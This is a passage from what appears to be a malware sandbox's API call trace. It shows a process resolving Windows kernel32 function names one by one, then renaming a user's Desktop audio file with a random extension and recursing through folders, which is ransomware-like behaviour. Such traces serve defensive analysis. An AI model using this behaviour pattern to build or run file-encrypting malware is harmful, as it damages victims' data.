returned="CreateFileA" [0083.053] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.053] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.053] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.053] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.053] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.053] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.053] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.053] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.053] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.053] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.053] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.053] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.053] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.053] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.054] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.054] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.054] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.054] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.054] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.054] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.054] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.054] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.054] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.054] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.054] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.054] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.054] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.054] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.054] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.054] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.054] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.054] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.054] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.054] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.054] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.054] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.054] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.054] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.054] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.054] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.054] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.054] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.054] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.054] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.054] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.054] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.054] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.054] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.054] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.054] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.054] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.055] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.055] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.055] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.055] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.055] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.055] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.055] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.055] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.055] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.055] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.055] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.055] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.055] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.055] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.055] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.055] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.055] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.055] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.055] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.055] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.055] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.055] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.055] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.055] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.055] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.055] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.055] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.055] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.055] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.055] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.055] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.055] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.055] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.055] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.055] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.055] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.055] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.056] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.056] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.056] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.056] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.056] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.056] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.056] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.056] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.056] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.056] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.056] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.056] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.056] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.056] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.056] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.056] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.056] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.056] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.056] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.056] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.056] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.056] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.056] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.056] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.056] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.056] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.056] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.056] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.056] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.056] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.056] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.056] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.056] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.056] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.056] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.056] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.056] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.057] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.057] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.057] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.057] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.057] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.057] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.057] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.057] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.057] lstrlenA (lpString="DELETEATOM") returned 10 [0083.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.057] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.057] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.057] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.057] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.057] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.057] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.057] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.057] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.057] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.057] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.058] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.058] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.058] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.058] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.058] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.058] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.058] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.058] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.058] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.058] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.058] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.058] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.058] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.058] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.058] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.058] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.058] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.058] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.058] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.058] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.059] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.059] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.059] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.059] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.059] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.059] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.059] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.059] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.059] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.059] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.059] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.059] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.059] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.059] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.059] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.059] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.059] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.059] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.059] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.059] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.059] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.059] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.059] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.059] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.059] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.059] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.059] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\f3Xg9nYjQ-ZhfDQwlSU.wav") returned 71 [0083.059] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\f3Xg9nYjQ-ZhfDQwlSU.wav.OGvTiq0") returned 79 [0083.060] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\f3Xg9nYjQ-ZhfDQwlSU.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\f3xg9nyjq-zhfdqwlsu.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\f3Xg9nYjQ-ZhfDQwlSU.wav.OGvTiq0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\f3xg9nyjq-zhfdqwlsu.wav.ogvtiq0"), dwFlags=0x0) returned 1 [0083.060] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.060] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.061] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.061] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb2bef0b0, ftCreationTime.dwHighDateTime=0x1d4ced9, ftLastAccessTime.dwLowDateTime=0xe7bf83c0, ftLastAccessTime.dwHighDateTime=0x1d4c55f, ftLastWriteTime.dwLowDateTime=0xe7bf83c0, ftLastWriteTime.dwHighDateTime=0x1d4c55f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="H1MiMyXALwnG6yS6", cAlternateFileName="H1MIMY~1")) returned 1 [0083.061] lstrcmpW (lpString1="H1MiMyXALwnG6yS6", lpString2=".") returned 1 [0083.061] lstrcmpW (lpString1="H1MiMyXALwnG6yS6", lpString2="..") returned 1 [0083.061] lstrcatW (in: lpString1="H1MiMyXALwnG6yS6", lpString2="\\" | out: lpString1="H1MiMyXALwnG6yS6\\") returned="H1MiMyXALwnG6yS6\\" [0083.061] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\", lpString2="H1MiMyXALwnG6yS6\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\H1MiMyXALwnG6yS6\\" [0083.061] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS 